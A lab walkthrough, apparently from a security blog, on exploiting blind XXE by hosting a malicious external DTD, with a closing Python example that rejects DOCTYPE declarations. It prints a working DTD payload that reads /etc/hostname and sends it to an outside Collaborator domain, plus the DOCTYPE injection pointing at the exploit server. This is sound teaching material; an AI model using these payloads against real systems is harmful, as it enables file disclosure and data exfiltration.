This is our 5th article on XXE and XML injection. Today, we will solve the lab on exploiting blind XXE to exfiltrate data using a malicious external DTD. We will solve it in a few easy steps, but first I will explain the lab and the theory behind the attack. In this lab, the response does not show the result directly, so we will host a malicious DTD file on our own server. The vulnerable XML parser will then fetch this file as an external entity, and that is how we exploit the lab.
Lab Description Of Exploiting blind XXE using a malicious external DTD
In this lab, we are instructed that there is a “check stock” feature available that parses XML input. However, this feature does not display any results. To solve the lab, we need to fetch the /etc/hostname file from the server. For this, you will need Burp Suite Professional, and we will be using Burp Collaborator.
Firstly, visit the lab.
After visiting the lab, you will see two options in the menu. The first option is “Go to Exploit Server,” and the second option is “Submit a Solution.”
Now, click on the “Exploit Server” option and assume that this is your own server where you need to host the malicious DTD file.
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;
So, the above is our malicious DTD file which we will simply modify. First, open your Burp Collaborator. After opening it, copy the payload and paste it into the malicious DTD file.
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://u504ox9vhlnsq0cudsys8giwyn4ds2.oastify.com/?x=%file;'>">
%eval;
%exfil;
The above DTD file is the final version. Now, store it by clicking on the “Store” button.
I have combined two screenshots together for your convenience. Clicking on “View Exploit” after storing it will display the stored exploit on the server in the next tab.
After this, the steps are quite easy. Let’s proceed to solve the lab.
Now, simply enable your proxy in Burp Suite and navigate to the lab. Once you are in the lab, view any product and after viewing, you will find a “Check Stock” button. Intercept the request containing the button click in Burp Suite and send it to the Repeater tab.
In the Repeater tab, you need to modify the XML. Use the following code:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
In the above code, replace “YOUR-DTD-URL” with the path of your malicious DTD file that you stored on the server.
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a060092039bf8cc83686025014500b7.exploit-server.net/exploit"> %xxe;]>
You can see that after following this process, I have received DNS and HTTP requests on Burp Collaborator.
I simply appended the extension “.dtd” to the name of the exploit. You can see that I have obtained the hostname. Even if you don’t include the extension, the task will still be completed.
When I submitted the hostname, our lab “Exploiting blind XXE to exfiltrate data using a malicious external DTD” was successfully solved. Congratulations!
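The Repeater step above depends on the parser accepting a DOCTYPE in the request body. As an added example (not code from the lab or from this article), here is one way a stock-check handler could refuse any DTD before parsing, using Python's standard expat bindings; the function names and the stockCheck/productId/storeId element names are assumptions.

```python
import xml.parsers.expat as expat


class DoctypeForbidden(ValueError):
    """Raised when a request body carries a DOCTYPE declaration."""


def parse_stock_check(body: bytes) -> dict:
    """Parse a stock-check body into {child element: text}, refusing any DTD."""
    fields, stack, text = {}, [], []

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # Raising here aborts the parse at the DOCTYPE, so nothing declared
        # in a DTD (internal or external) is ever expanded.
        raise DoctypeForbidden(f"DOCTYPE {name!r} rejected")

    def start(name, attrs):
        stack.append(name)
        text.clear()

    def end(name):
        if len(stack) == 2:          # direct child of the root element
            fields[name] = "".join(text).strip()
        stack.pop()

    parser = expat.ParserCreate()
    # Keep parameter-entity parsing explicitly off as defence in depth.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)
    return fields


# Constructed sample bodies: element names are assumed; the DOCTYPE is the
# placeholder form shown in the article.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
WITH_DTD = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>'
            b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')


def is_rejected(body: bytes) -> bool:
    """Return True when the body is refused because it contains a DOCTYPE."""
    try:
        parse_stock_check(body)
    except DoctypeForbidden:
        return True
    return False
```

A legitimate stock check never needs a DTD, so rejecting the declaration outright costs the feature nothing and also gives a clean event to log and alert on.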